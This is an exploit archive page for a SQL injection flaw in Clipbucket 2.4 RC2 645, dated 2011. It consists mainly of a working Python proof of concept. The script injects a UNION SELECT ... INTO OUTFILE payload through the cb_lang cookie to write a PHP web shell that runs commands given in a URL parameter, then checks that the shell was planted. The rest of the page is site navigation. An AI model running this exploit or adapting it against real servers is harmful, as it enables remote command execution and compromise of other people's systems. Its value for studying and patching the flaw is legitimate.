Clipbucket 2.4 RC2 645 SQL Injection

Clipbucket 2.4 RC2 645 SQL Injection: Posted May 25, 2011; Authored by AutoSec Tools | Site autosectools.com; A SQL injection vulnerability in Clipbucket version 2.4 RC2 645 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.; tags | exploit, arbitrary, shell, php, sql injection; SHA-256 | 6f0d10f78695697be08aaad71f69ebf5932985db42e1fc464f2a06ce15f1d538; Download | Favorite | View

Clipbucket 2.4 RC2 645 SQL Injection

# ------------------------------------------------------------------------
# Software................Clipbucket 2.4 RC2 645
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.clip-bucket.com/
# Discovery Date..........5/23/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A sql injection vulnerability in Clipbucket 2.4 RC2 645 can be
# exploited to extract arbitrary data. In some environments it may be
# possible to create a PHP shell.
# 
# 
# --PoC--

import socket

host = 'localhost'
path = '/clipbucket'
shell_path = '/shell.php'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/includes/common.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 0\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: cb_lang=\'and%201=0%20UNION%20SELECT%20\'%3C?php%20echo%20system($_GET[%22CMD%22])%3b%20?%3E\',\'\',\'\',\'\',\'\',\'\'%20FROM%20dual%20INTO%20OUTFILE%20\'../../htdocs/shell.php\'%3b%23; sess_salt=1testab\'testxy\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path

upload_shell()

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Clipbucket 2.4 RC2 645 SQL Injection

Clipbucket 2.4 RC2 645 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Clipbucket 2.4 RC2 645 SQL Injection

Share This

Clipbucket 2.4 RC2 645 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems